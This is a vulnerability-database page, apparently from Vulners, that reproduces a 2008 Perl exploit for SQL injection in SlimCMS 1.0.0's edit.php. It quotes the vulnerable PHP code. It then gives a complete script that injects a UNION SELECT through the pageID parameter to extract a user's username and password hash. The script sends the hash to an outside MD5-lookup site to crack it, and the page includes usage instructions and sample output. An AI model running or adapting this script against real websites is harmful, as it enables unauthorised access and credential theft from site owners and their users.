Lucene search
K

slimcms-sql.txt

🗓️ 14 Nov 2008 00:00:00Reported by StAkeRType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 17 Views

SlimCMS 1.0.0 Remote SQL Injection Exploi

Code
`#!/usr/bin/perl  
  
=starting  
  
--------------------------------------------------------  
SlimCMS <= 1.0.0 (edit.php) Remote SQL Injection Exploit  
--------------------------------------------------------  
by athos - staker[at]hotmail[dot]it  
  
download on sourceforge   
  
  
File edit.php  
  
111. if ($password == md5($_POST['password']))  
112. {  
113. if (strlen($_POST['cmsText']) > 2) {  
114. $query = "UPDATE pages SET title = '".$_POST['pageTitle']."', content = '".  
strip_tags(stripslashes($_POST['cmsText']),$allowedTags)."' WHERE ID = ".$_GET['pageID'];  
115. mysql_query($query);  
116. //$successfulyUpdated  
117. responseText = $successfulyUpdated;  
118. }  
119.  
120. if (strlen($_GET['pageID']) > 0) {  
121. $query = "SELECT * FROM pages WHERE ID = ".$_GET['pageID'];  
122. $result = mysql_query($query);  
123.  
124.   
125. while($row = mysql_fetch_array($result)) {  
126. $pageTitle = $row['title'];  
127. $pageContent = $row['content'];  
128. }  
129. }  
  
NOTE: Works Regardless PHP.ini Settings!  
  
  
you must be logged..  
  
Usage: perl "exploit.pl" [HOST] [username:password] [USER_ID]  
  
Output: Username: athos  
Password: 27e43424d53719a645ae7cca038b45be  
  
  
  
=cut  
  
use strict;  
use LWP::UserAgent;  
use LWP::Simple;  
  
my $match = q{Editing page "(.+?)"};  
my $http = new LWP::UserAgent;   
my $post = undef;  
my @login = ();  
my @out = ();  
  
my ($host,$auth,$myid) = @ARGV;  
  
unless($host =~ /http:\/\/(.+?)$/i && $auth && $myid)  
{  
print STDOUT "Usage: perl $0 [host/path] [username:password] [id]\r\n";   
exit;  
}   
  
$host .= "/edit.php?pageID=-1 union select 1,concat(username,0x3a,password),3,4 from users where id=$myid#";  
  
@login = split(':',$auth);  
  
$post = $http->post($host,[   
username => $login[0],  
password => $login[1],  
]);  
  
  
if($post->is_success && $post->content =~ $match)   
{  
@out = split(':',$1);  
  
if($#out => 2)  
{  
my $cracked = search_MD5($out[1]);  
  
print STDOUT "Username: $out[0]\r\n";  
print STDOUT "Password: $out[1] -> $cracked\r\n";  
exit;   
}  
else  
{  
print STDOUT "Exploit Failed!\r\n";  
print STDOUT "Login incorrect or site not vulnerable\\available!\r\n";  
exit;  
}  
}  
  
  
sub search_MD5  
{  
my $hash = shift @_;  
my $cont = undef;  
  
$cont = get('http://md5.rednoize.com/?p&s=md5&q='.$hash);  
  
if(length($hash) => 32 && !is_error($cont))  
{  
return $cont;  
}  
else  
{  
return exit;  
}  
}   
  
__END__  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

14 Nov 2008 00:00Current
7.4High risk
Vulners AI Score7.4
17